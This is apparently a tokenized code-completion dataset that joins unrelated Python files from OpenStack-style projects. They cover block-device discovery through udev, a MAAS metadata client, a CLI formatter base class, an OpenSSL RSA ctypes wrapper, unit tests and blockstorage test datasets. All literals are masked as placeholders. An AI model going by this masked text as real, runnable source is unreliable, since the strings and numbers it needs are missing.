scsi_sg_path + '<STR_LIT>' ) . read ( ) . splitlines ( ) <EOL> except IOError : <EOL> return [ ] <EOL> else : <EOL> return [ '<STR_LIT::>' . join ( dev . split ( ) [ : <NUM_LIT:4> ] ) for dev in scsi_devices ] <EOL> def scsi_address ( dev ) : <EOL> for address in scsi_address_list ( ) : <EOL> scsi_path = '<STR_LIT>' % address <EOL> if dev == os . path . join ( '<STR_LIT>' , os . listdir ( scsi_path ) [ <NUM_LIT:0> ] ) : <EOL> return address <EOL> def get_block_devices_from_udev_db ( ) : <EOL> return get_block_data_from_udev ( '<STR_LIT>' ) <EOL> def get_partitions_from_udev_db ( ) : <EOL> return get_block_data_from_udev ( '<STR_LIT>' ) <EOL> def get_vg_devices_from_udev_db ( ) : <EOL> return get_block_data_from_udev ( '<STR_LIT>' , vg = True ) <EOL> def _is_valid_dev_type ( device_info , vg ) : <EOL> """<STR_LIT>""" <EOL> if ( <EOL> '<STR_LIT>' in device_info and <EOL> int ( device_info [ '<STR_LIT>' ] ) not in VALID_MAJORS <EOL> ) : <EOL> return False <EOL> if any ( <EOL> os . path . basename ( device_info [ '<STR_LIT>' ] ) . startswith ( n ) <EOL> for n in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) : <EOL> return False <EOL> if '<STR_LIT>' not in device_info : <EOL> return False <EOL> if ( vg and '<STR_LIT>' in device_info or <EOL> not vg and '<STR_LIT>' not in device_info ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def get_block_data_from_udev ( devtype , vg = False ) : <EOL> devs = [ ] <EOL> output = utils . execute ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> for device in output . split ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' in device and '<STR_LIT>' % devtype in device : <EOL> device_info = dict ( ( line . partition ( '<STR_LIT:=>' ) [ <NUM_LIT:0> ] , line . partition ( '<STR_LIT:=>' ) [ <NUM_LIT:2> ] ) <EOL> for line in device . split ( '<STR_LIT:\n>' ) <EOL> if line . startswith ( '<STR_LIT>' ) ) <EOL> if _is_valid_dev_type ( device_info , vg ) : <EOL> devs . append ( device_info [ '<STR_LIT>' ] ) <EOL> return devs <EOL> def list_block_devices ( disks = True ) : <EOL> """<STR_LIT>""" <EOL> bdevs = [ ] <EOL> devs = get_block_devices_from_udev_db ( ) <EOL> for device in devs : <EOL> bdev = get_device_info ( device , disks ) <EOL> if bdev : <EOL> bdevs . append ( bdev ) <EOL> return bdevs <EOL> def get_device_ids ( device ) : <EOL> uspec = udevreport ( device ) <EOL> if '<STR_LIT>' not in uspec : <EOL> return None <EOL> paths = [ ] <EOL> for element in uspec [ '<STR_LIT>' ] : <EOL> regex = re . search ( r'<STR_LIT>' , element ) <EOL> if regex : <EOL> val = regex . group ( <NUM_LIT:0> ) <EOL> paths . append ( val ) <EOL> return { '<STR_LIT:name>' : device , '<STR_LIT>' : paths } <EOL> def get_device_info ( device , disks = True ) : <EOL> try : <EOL> uspec = udevreport ( device ) <EOL> espec = extrareport ( device ) <EOL> bspec = blockdevreport ( device ) <EOL> except ( KeyError , ValueError , TypeError , <EOL> errors . ProcessExecutionError ) as e : <EOL> LOG . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> device , e ) <EOL> return <EOL> if disks and not is_disk ( device , bspec = bspec , uspec = uspec ) : <EOL> return <EOL> bdev = { <EOL> '<STR_LIT>' : device , <EOL> '<STR_LIT>' : uspec , <EOL> '<STR_LIT>' : bspec , <EOL> '<STR_LIT>' : espec <EOL> } <EOL> return bdev <EOL> def match_device ( uspec1 , uspec2 ) : <EOL> """<STR_LIT>""" <EOL> if ( '<STR_LIT>' in uspec1 and '<STR_LIT>' in uspec2 <EOL> and uspec1 [ '<STR_LIT>' ] != uspec2 [ '<STR_LIT>' ] ) : <EOL> return False <EOL> if ( '<STR_LIT>' in uspec1 and '<STR_LIT>' in uspec2 <EOL> and uspec1 [ '<STR_LIT>' ] != uspec2 [ '<STR_LIT>' ] ) : <EOL> return False <EOL> if ( '<STR_LIT>' in uspec1 and '<STR_LIT>' in uspec2 <EOL> and any ( x . startswith ( '<STR_LIT>' ) for x in <EOL> set ( uspec1 [ '<STR_LIT>' ] ) & set ( uspec2 [ '<STR_LIT>' ] ) ) ) : <EOL> return True <EOL> if ( uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) is not None <EOL> and uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) == '<STR_LIT>' ) : <EOL> return True <EOL> if ( uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) is not None <EOL> and uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> and uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) is not None ) : <EOL> return True <EOL> if ( uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) <EOL> is not None <EOL> and uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) == '<STR_LIT>' ) : <EOL> return True <EOL> if uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) is not None : <EOL> return True <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> import abc <EOL> from itertools import compress <EOL> import six <EOL> import stevedore <EOL> from . command import Command <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class DisplayCommandBase ( Command ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , app_args , cmd_name = None ) : <EOL> super ( DisplayCommandBase , self ) . __init__ ( app , app_args , <EOL> cmd_name = cmd_name ) <EOL> self . _formatter_plugins = self . _load_formatter_plugins ( ) <EOL> @ abc . abstractproperty <EOL> def formatter_namespace ( self ) : <EOL> "<STR_LIT>" <EOL> @ abc . abstractproperty <EOL> def formatter_default ( self ) : <EOL> "<STR_LIT>" <EOL> def _load_formatter_plugins ( self ) : <EOL> return stevedore . ExtensionManager ( <EOL> self . formatter_namespace , <EOL> invoke_on_load = True , <EOL> ) <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( DisplayCommandBase , self ) . get_parser ( prog_name ) <EOL> formatter_group = parser . add_argument_group ( <EOL> title = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> ) <EOL> formatter_choices = sorted ( self . _formatter_plugins . names ( ) ) <EOL> formatter_default = self . formatter_default <EOL> if formatter_default not in formatter_choices : <EOL> formatter_default = formatter_choices [ <NUM_LIT:0> ] <EOL> formatter_group . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> choices = formatter_choices , <EOL> default = formatter_default , <EOL> help = '<STR_LIT>' % formatter_default , <EOL> ) <EOL> formatter_group . add_argument ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> for formatter in self . _formatter_plugins : <EOL> formatter . obj . add_argument_group ( parser ) <EOL> return parser <EOL> @ abc . abstractmethod <EOL> def produce_output ( self , parsed_args , column_names , data ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , parsed_args ) : <EOL> self . formatter = self . _formatter_plugins [ parsed_args . formatter ] . obj <EOL> column_names , data = self . take_action ( parsed_args ) <EOL> self . produce_output ( parsed_args , column_names , data ) <EOL> return <NUM_LIT:0> <EOL> @ staticmethod <EOL> def _compress_iterable ( iterable , selectors ) : <EOL> return compress ( iterable , selectors ) </s>
<s> import posixpath <EOL> import re <EOL> from oauthlib import oauth1 <EOL> from oslo_config import cfg <EOL> from oslo_log import log as oslo_logging <EOL> from six . moves . urllib import error <EOL> from six . moves . urllib import request <EOL> from cloudbaseinit . metadata . services import base <EOL> from cloudbaseinit . utils import x509constants <EOL> opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_opts ( opts ) <EOL> LOG = oslo_logging . getLogger ( __name__ ) <EOL> class _Realm ( str ) : <EOL> def __bool__ ( self ) : <EOL> return True <EOL> __nonzero__ = __bool__ <EOL> class MaaSHttpService ( base . BaseMetadataService ) : <EOL> _METADATA_2012_03_01 = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> super ( MaaSHttpService , self ) . __init__ ( ) <EOL> self . _enable_retry = True <EOL> self . _metadata_version = self . _METADATA_2012_03_01 <EOL> def load ( self ) : <EOL> super ( MaaSHttpService , self ) . load ( ) <EOL> if not CONF . maas_metadata_url : <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> else : <EOL> try : <EOL> self . _get_cache_data ( '<STR_LIT>' % self . _metadata_version ) <EOL> return True <EOL> except Exception as ex : <EOL> LOG . exception ( ex ) <EOL> LOG . debug ( '<STR_LIT>' % <EOL> CONF . maas_metadata_url ) <EOL> return False <EOL> def _get_response ( self , req ) : <EOL> try : <EOL> return request . urlopen ( req ) <EOL> except error . HTTPError as ex : <EOL> if ex . code == <NUM_LIT> : <EOL> raise base . NotExistingMetadataException ( ) <EOL> else : <EOL> raise <EOL> def _get_oauth_headers ( self , url ) : <EOL> client = oauth1 . Client ( <EOL> CONF . maas_oauth_consumer_key , <EOL> client_secret = CONF . maas_oauth_consumer_secret , <EOL> resource_owner_key = CONF . maas_oauth_token_key , <EOL> resource_owner_secret = CONF . maas_oauth_token_secret , <EOL> signature_method = oauth1 . SIGNATURE_PLAINTEXT ) <EOL> realm = _Realm ( "<STR_LIT>" ) <EOL> headers = client . sign ( url , realm = realm ) [ <NUM_LIT:1> ] <EOL> return headers <EOL> def _get_data ( self , path ) : <EOL> norm_path = posixpath . join ( CONF . maas_metadata_url , path ) <EOL> oauth_headers = self . _get_oauth_headers ( norm_path ) <EOL> LOG . debug ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : norm_path } ) <EOL> req = request . Request ( norm_path , headers = oauth_headers ) <EOL> response = self . _get_response ( req ) <EOL> return response . read ( ) <EOL> def get_host_name ( self ) : <EOL> return self . _get_cache_data ( '<STR_LIT>' % <EOL> self . _metadata_version , decode = True ) <EOL> def get_instance_id ( self ) : <EOL> return self . _get_cache_data ( '<STR_LIT>' % <EOL> self . _metadata_version , decode = True ) <EOL> def get_public_keys ( self ) : <EOL> return self . _get_cache_data ( '<STR_LIT>' % <EOL> self . _metadata_version , <EOL> decode = True ) . splitlines ( ) <EOL> def get_client_auth_certs ( self ) : <EOL> certs_data = self . _get_cache_data ( '<STR_LIT>' % <EOL> self . _metadata_version , <EOL> decode = True ) <EOL> pattern = r"<STR_LIT>" . format ( <EOL> begin = x509constants . PEM_HEADER , <EOL> end = x509constants . PEM_FOOTER ) <EOL> return re . findall ( pattern , certs_data ) <EOL> def get_user_data ( self ) : <EOL> return self . _get_cache_data ( '<STR_LIT>' % self . _metadata_version ) </s>
<s> from oslo_log import log as oslo_logging <EOL> from cloudbaseinit . osutils import factory <EOL> from cloudbaseinit . plugins . common . userdataplugins . cloudconfigplugins import ( <EOL> base <EOL> ) <EOL> LOG = oslo_logging . getLogger ( __name__ ) <EOL> class SetTimezonePlugin ( base . BaseCloudConfigPlugin ) : <EOL> """<STR_LIT>""" <EOL> def process ( self , data ) : <EOL> LOG . info ( "<STR_LIT>" , data ) <EOL> osutils = factory . get_os_utils ( ) <EOL> osutils . set_timezone ( data ) </s>
<s> import unittest <EOL> try : <EOL> import unittest . mock as mock <EOL> except ImportError : <EOL> import mock <EOL> from cloudbaseinit import exception <EOL> from cloudbaseinit . metadata import factory <EOL> from cloudbaseinit . tests import testutils <EOL> class MetadataServiceFactoryTests ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def _test_get_metadata_service ( self , mock_load_class , <EOL> ret_value = mock . MagicMock ( ) , <EOL> load_exception = False ) : <EOL> mock_load_class . side_effect = ret_value <EOL> if load_exception : <EOL> mock_load_class ( ) ( ) . load . side_effect = Exception <EOL> with self . assertRaises ( exception . CloudbaseInitException ) : <EOL> factory . get_metadata_service ( ) <EOL> return <EOL> if ret_value is exception . CloudbaseInitException : <EOL> self . assertRaises ( exception . CloudbaseInitException , <EOL> factory . get_metadata_service ) <EOL> else : <EOL> response = factory . get_metadata_service ( ) <EOL> self . assertEqual ( mock_load_class ( ) ( ) , response ) <EOL> def test_get_metadata_service ( self ) : <EOL> self . _test_get_metadata_service ( ) <EOL> def test_get_metadata_service_exception ( self ) : <EOL> self . _test_get_metadata_service ( <EOL> ret_value = exception . CloudbaseInitException ) <EOL> def test_get_metadata_service_load_exception ( self ) : <EOL> with testutils . LogSnatcher ( '<STR_LIT>' <EOL> '<STR_LIT>' ) : <EOL> self . _test_get_metadata_service ( load_exception = True ) </s>
<s> import unittest <EOL> try : <EOL> import unittest . mock as mock <EOL> except ImportError : <EOL> import mock <EOL> from oslo_config import cfg <EOL> from cloudbaseinit import exception <EOL> from cloudbaseinit . plugins . windows import ntpclient <EOL> CONF = cfg . CONF <EOL> class NTPClientPluginTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _ntpclient = ntpclient . NTPClientPlugin ( ) <EOL> def test_set_ntp_trigger_mode ( self ) : <EOL> mock_osutils = mock . Mock ( ) <EOL> self . _ntpclient . _set_ntp_trigger_mode ( mock_osutils ) <EOL> mock_osutils . execute_system32_process . assert_called_once_with ( <EOL> [ "<STR_LIT>" , "<STR_LIT>" , ntpclient . _W32TIME_SERVICE , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _test_check_w32time_svc_status ( self , mock_set_ntp_trigger_mode , <EOL> mock_sleep , start_mode , <EOL> fail_service_start , <EOL> patch_check_os_version = True ) : <EOL> mock_osutils = mock . MagicMock ( ) <EOL> mock_osutils . SERVICE_START_MODE_AUTOMATIC = "<STR_LIT>" <EOL> mock_osutils . SERVICE_STATUS_RUNNING = "<STR_LIT>" <EOL> mock_osutils . SERVICE_STATUS_STOPPED = "<STR_LIT>" <EOL> mock_osutils . get_service_start_mode . return_value = start_mode <EOL> mock_osutils . check_os_version . return_value = patch_check_os_version <EOL> if fail_service_start : <EOL> mock_osutils . get_service_status . return_value = "<STR_LIT>" <EOL> self . assertRaises ( exception . CloudbaseInitException , <EOL> self . _ntpclient . verify_time_service , <EOL> mock_osutils ) <EOL> else : <EOL> mock_osutils . get_service_status . side_effect = [ <EOL> "<STR_LIT>" , mock_osutils . SERVICE_STATUS_RUNNING ] <EOL> self . _ntpclient . verify_time_service ( osutils = mock_osutils ) <EOL> if start_mode != mock_osutils . SERVICE_START_MODE_AUTOMATIC : <EOL> mock_osutils . set_service_start_mode . assert_called_once_with ( <EOL> ntpclient . _W32TIME_SERVICE , <EOL> mock_osutils . SERVICE_START_MODE_AUTOMATIC ) <EOL> mock_sleep . assert_called_once_with ( <NUM_LIT:1> ) <EOL> mock_osutils . start_service . assert_called_once_with ( <EOL> ntpclient . _W32TIME_SERVICE ) <EOL> mock_osutils . get_service_start_mode . assert_called_once_with ( <EOL> ntpclient . _W32TIME_SERVICE ) <EOL> mock_osutils . get_service_status . assert_called_with ( <EOL> ntpclient . _W32TIME_SERVICE ) <EOL> mock_osutils . check_os_version . assert_called_once_with ( <NUM_LIT:6> , <NUM_LIT:1> ) <EOL> if patch_check_os_version : <EOL> mock_set_ntp_trigger_mode . assert_called_once_with ( mock_osutils ) <EOL> else : <EOL> self . assertFalse ( mock_set_ntp_trigger_mode . called ) <EOL> def test_check_w32time_svc_status_other_start_mode ( self ) : <EOL> self . _test_check_w32time_svc_status ( start_mode = "<STR_LIT>" , <EOL> fail_service_start = False ) <EOL> def test_check_w32time_svc_status_start_automatic ( self ) : <EOL> self . _test_check_w32time_svc_status ( start_mode = "<STR_LIT>" , <EOL> fail_service_start = False ) <EOL> def test_check_w32time_svc_status_exception ( self ) : <EOL> self . _test_check_w32time_svc_status ( start_mode = "<STR_LIT>" , <EOL> fail_service_start = True ) <EOL> def test_check_w32time_older_oses ( self ) : <EOL> self . _test_check_w32time_svc_status ( start_mode = "<STR_LIT>" , <EOL> fail_service_start = False , <EOL> patch_check_os_version = False ) </s>
<s> import base64 <EOL> import ctypes <EOL> import ctypes . util <EOL> import struct <EOL> import sys <EOL> if sys . platform == "<STR_LIT:win32>" : <EOL> openssl_lib_path = "<STR_LIT>" <EOL> else : <EOL> openssl_lib_path = ctypes . util . find_library ( "<STR_LIT>" ) <EOL> openssl = ctypes . CDLL ( openssl_lib_path ) <EOL> clib = ctypes . CDLL ( ctypes . util . find_library ( "<STR_LIT:c>" ) ) <EOL> class RSA ( ctypes . Structure ) : <EOL> _fields_ = [ <EOL> ( "<STR_LIT>" , ctypes . c_int ) , <EOL> ( "<STR_LIT:version>" , ctypes . c_long ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT:n>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT:e>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT:d>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT:p>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT:q>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_int ) , <EOL> ( "<STR_LIT>" , ctypes . c_int ) , <EOL> ( "<STR_LIT>" , ctypes . c_int ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_char_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) <EOL> ] <EOL> openssl . RSA_PKCS1_PADDING = <NUM_LIT:1> <EOL> openssl . RSA_new . restype = ctypes . POINTER ( RSA ) <EOL> openssl . BN_bin2bn . restype = ctypes . c_void_p <EOL> openssl . BN_bin2bn . argtypes = [ ctypes . c_char_p , ctypes . c_int , ctypes . c_void_p ] <EOL> openssl . BN_new . restype = ctypes . c_void_p <EOL> openssl . RSA_size . restype = ctypes . c_int <EOL> openssl . RSA_size . argtypes = [ ctypes . POINTER ( RSA ) ] <EOL> openssl . RSA_public_encrypt . argtypes = [ ctypes . c_int , <EOL> ctypes . c_char_p , <EOL> ctypes . c_char_p , <EOL> ctypes . POINTER ( RSA ) , <EOL> ctypes . c_int ] <EOL> openssl . RSA_public_encrypt . restype = ctypes . c_int <EOL> openssl . RSA_free . argtypes = [ ctypes . POINTER ( RSA ) ] <EOL> openssl . PEM_write_RSAPublicKey . restype = ctypes . c_int <EOL> openssl . PEM_write_RSAPublicKey . argtypes = [ ctypes . c_void_p , <EOL> ctypes . POINTER ( RSA ) ] <EOL> openssl . ERR_get_error . restype = ctypes . c_long <EOL> openssl . ERR_get_error . argtypes = [ ] <EOL> openssl . ERR_error_string_n . restype = ctypes . c_void_p <EOL> openssl . ERR_error_string_n . argtypes = [ ctypes . c_long , <EOL> ctypes . c_char_p , <EOL> ctypes . c_int ] <EOL> openssl . ERR_load_crypto_strings . restype = ctypes . c_int <EOL> openssl . ERR_load_crypto_strings . argtypes = [ ] <EOL> clib . fopen . restype = ctypes . c_void_p <EOL> clib . fopen . argtypes = [ ctypes . c_char_p , ctypes . c_char_p ] <EOL> clib . fclose . restype = ctypes . c_int <EOL> clib . fclose . argtypes = [ ctypes . c_void_p ] <EOL> class CryptException ( Exception ) : <EOL> pass <EOL> class OpenSSLException ( CryptException ) : <EOL> def __init__ ( self ) : <EOL> message = self . _get_openssl_error_msg ( ) <EOL> super ( OpenSSLException , self ) . __init__ ( message ) <EOL> def _get_openssl_error_msg ( self ) : <EOL> openssl . ERR_load_crypto_strings ( ) <EOL> errno = openssl . ERR_get_error ( ) <EOL> errbuf = ctypes . create_string_buffer ( <NUM_LIT> ) <EOL> openssl . ERR_error_string_n ( errno , errbuf , <NUM_LIT> ) <EOL> return errbuf . value . decode ( "<STR_LIT:ascii>" ) <EOL> class RSAWrapper ( object ) : <EOL> def __init__ ( self , rsa_p ) : <EOL> self . _rsa_p = rsa_p <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , tp , value , tb ) : <EOL> self . free ( ) <EOL> def free ( self ) : <EOL> openssl . RSA_free ( self . _rsa_p ) <EOL> def public_encrypt ( self , clear_text ) : <EOL> flen = len ( clear_text ) <EOL> rsa_size = openssl . RSA_size ( self . _rsa_p ) <EOL> enc_text = ctypes . create_string_buffer ( rsa_size ) <EOL> enc_text_len = openssl . RSA_public_encrypt ( flen , <EOL> clear_text , <EOL> enc_text , <EOL> self . _rsa_p , <EOL> openssl . RSA_PKCS1_PADDING ) <EOL> if enc_text_len == - <NUM_LIT:1> : <EOL> raise OpenSSLException ( ) <EOL> return enc_text [ : enc_text_len ] <EOL> class CryptManager ( object ) : <EOL> def load_ssh_rsa_public_key ( self , ssh_pub_key ) : <EOL> ssh_rsa_prefix = "<STR_LIT>" <EOL> if not ssh_pub_key . startswith ( ssh_rsa_prefix ) : <EOL> raise CryptException ( '<STR_LIT>' ) <EOL> s = ssh_pub_key [ len ( ssh_rsa_prefix ) : ] <EOL> idx = s . find ( '<STR_LIT:U+0020>' ) <EOL> if idx >= <NUM_LIT:0> : <EOL> b64_pub_key = s [ : idx ] <EOL> else : <EOL> b64_pub_key = s <EOL> pub_key = base64 . b64decode ( b64_pub_key ) <EOL> offset = <NUM_LIT:0> <EOL> key_type_len = struct . unpack ( '<STR_LIT>' , pub_key [ offset : offset + <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> offset += <NUM_LIT:4> <EOL> key_type = pub_key [ offset : offset + key_type_len ] . decode ( '<STR_LIT:utf-8>' ) <EOL> offset += key_type_len <EOL> if key_type not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise CryptException ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % key_type ) <EOL> rsa_p = openssl . RSA_new ( ) <EOL> try : <EOL> rsa_p . contents . e = openssl . BN_new ( ) <EOL> rsa_p . contents . n = openssl . BN_new ( ) <EOL> e_len = struct . unpack ( '<STR_LIT>' , pub_key [ offset : offset + <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> offset += <NUM_LIT:4> <EOL> e_key_bin = pub_key [ offset : offset + e_len ] <EOL> offset += e_len <EOL> if not openssl . BN_bin2bn ( e_key_bin , e_len , rsa_p . contents . e ) : <EOL> raise OpenSSLException ( ) <EOL> n_len = struct . unpack ( '<STR_LIT>' , pub_key [ offset : offset + <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> offset += <NUM_LIT:4> <EOL> n_key_bin = pub_key [ offset : offset + n_len ] <EOL> offset += n_len <EOL> if offset != len ( pub_key ) : <EOL> raise CryptException ( '<STR_LIT>' ) <EOL> if not openssl . BN_bin2bn ( n_key_bin , n_len , rsa_p . contents . n ) : <EOL> raise OpenSSLException ( ) <EOL> return RSAWrapper ( rsa_p ) <EOL> except Exception : <EOL> openssl . RSA_free ( rsa_p ) <EOL> raise </s>
<s> """<STR_LIT>""" <EOL> __title__ = '<STR_LIT>' <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from cafe . drivers . unittest . datasets import DatasetList , _Dataset <EOL> from cafe . drivers . unittest . decorators import memoized <EOL> from cloudcafe . common . datasets import ModelBasedDatasetToolkit <EOL> from cloudcafe . blockstorage . composites import VolumesAutoComposite <EOL> try : <EOL> from cloudcafe . compute . datasets import ComputeDatasets <EOL> except Exception as ex : <EOL> import warnings <EOL> msg = "<STR_LIT>" <EOL> warnings . warn ( msg ) <EOL> class ComputeDatasets ( object ) : <EOL> pass <EOL> class BlockstorageDatasets ( ModelBasedDatasetToolkit ) : <EOL> """<STR_LIT>""" <EOL> _volumes = VolumesAutoComposite ( ) <EOL> @ classmethod <EOL> @ memoized <EOL> def _get_volume_types ( cls ) : <EOL> """<STR_LIT>""" <EOL> return cls . _get_model_list ( <EOL> cls . _volumes . client . list_all_volume_types , '<STR_LIT>' ) <EOL> @ classmethod <EOL> def _get_volume_type_names ( cls ) : <EOL> """<STR_LIT>""" <EOL> vtype_names = [ ] <EOL> for vtype in cls . _get_volume_types ( ) : <EOL> vtype_names . append ( vtype . name ) <EOL> return vtype_names <EOL> @ classmethod <EOL> def default_volume_type_model ( cls ) : <EOL> for vtype in cls . _get_volume_types ( ) : <EOL> if ( vtype . id_ == cls . _volumes . config . default_volume_type <EOL> or vtype . name == cls . _volumes . config . default_volume_type ) : <EOL> return vtype <EOL> raise Exception ( "<STR_LIT>" ) <EOL> @ classmethod <EOL> def default_volume_type ( cls ) : <EOL> vol_type = cls . default_volume_type_model ( ) <EOL> dataset = _Dataset ( <EOL> name = vol_type . name , <EOL> data_dict = { <EOL> '<STR_LIT>' : vol_type . name , <EOL> '<STR_LIT>' : vol_type . id_ } ) <EOL> dataset_list = DatasetList ( ) <EOL> dataset_list . append ( dataset ) <EOL> return dataset_list <EOL> @ classmethod <EOL> def volume_types ( <EOL> cls , max_datasets = None , randomize = None , model_filter = None , <EOL> filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE , tags = None ) : <EOL> """<STR_LIT>""" <EOL> volume_type_list = cls . _get_volume_types ( ) <EOL> volume_type_list = cls . _filter_model_list ( <EOL> volume_type_list , model_filter = model_filter , <EOL> filter_mode = filter_mode ) <EOL> dataset_list = DatasetList ( ) <EOL> for vol_type in volume_type_list : <EOL> data = { '<STR_LIT>' : vol_type . name , <EOL> '<STR_LIT>' : vol_type . id_ } <EOL> dataset_list . append_new_dataset ( vol_type . name , data ) <EOL> dataset_list = cls . _modify_dataset_list ( <EOL> dataset_list , max_datasets = max_datasets , randomize = randomize ) <EOL> if tags : <EOL> dataset_list . apply_test_tags ( * tags ) <EOL> return dataset_list <EOL> @ classmethod <EOL> def configured_volume_types ( <EOL> cls , max_datasets = None , randomize = False , tags = None ) : <EOL> """<STR_LIT>""" <EOL> volume_type_filter = cls . _volumes . config . volume_type_filter <EOL> volume_type_filter_mode = cls . _volumes . config . volume_type_filter_mode <EOL> return cls . volume_types ( <EOL> max_datasets = max_datasets , <EOL> randomize = randomize , <EOL> model_filter = volume_type_filter , <EOL> filter_mode = volume_type_filter_mode , <EOL> tags = tags ) <EOL> class ComputeIntegrationDatasets ( ComputeDatasets , BlockstorageDatasets ) : <EOL> @ classmethod <EOL> def images_by_volume_type ( <EOL> cls , max_datasets = None , randomize = False , <EOL> image_filter = None , volume_type_filter = None , <EOL> image_filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE , <EOL> volume_type_filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE ) : <EOL> """<STR_LIT>""" <EOL> image_list = cls . _get_images ( ) <EOL> image_list = cls . _filter_model_list ( <EOL> image_list , model_filter = image_filter , <EOL> filter_mode = image_filter_mode ) <EOL> volume_type_list = cls . _get_volume_types ( ) <EOL> volume_type_list = cls . _filter_model_list ( <EOL> volume_type_list , model_filter = volume_type_filter , <EOL> filter_mode = volume_type_filter_mode ) <EOL> dataset_list = DatasetList ( ) <EOL> for vtype in volume_type_list : <EOL> for image in image_list : <EOL> data = { '<STR_LIT>' : vtype , <EOL> '<STR_LIT:image>' : image } <EOL> testname = "<STR_LIT>" . format ( <EOL> str ( vtype . name ) . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) , <EOL> str ( image . name ) . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) ) <EOL> dataset_list . append_new_dataset ( testname , data ) <EOL> return cls . _modify_dataset_list ( <EOL> dataset_list , max_datasets = max_datasets , randomize = randomize ) <EOL> @ classmethod <EOL> def flavors_by_images_by_volume_type ( <EOL> cls , max_datasets = None , randomize = None , <EOL> flavor_filter = None , volume_type_filter = None , image_filter = None , <EOL> flavor_filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE , <EOL> volume_type_filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE , <EOL> image_filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE , ) : <EOL> """<STR_LIT>""" <EOL> image_list = cls . _get_images ( ) <EOL> image_list = cls . _filter_model_list ( <EOL> image_list , model_filter = image_filter , <EOL> filter_mode = image_filter_mode ) <EOL> flavor_list = cls . _get_flavors ( ) <EOL> flavor_list = cls . _filter_model_list ( <EOL> flavor_list , model_filter = flavor_filter , <EOL> filter_mode = flavor_filter_mode ) 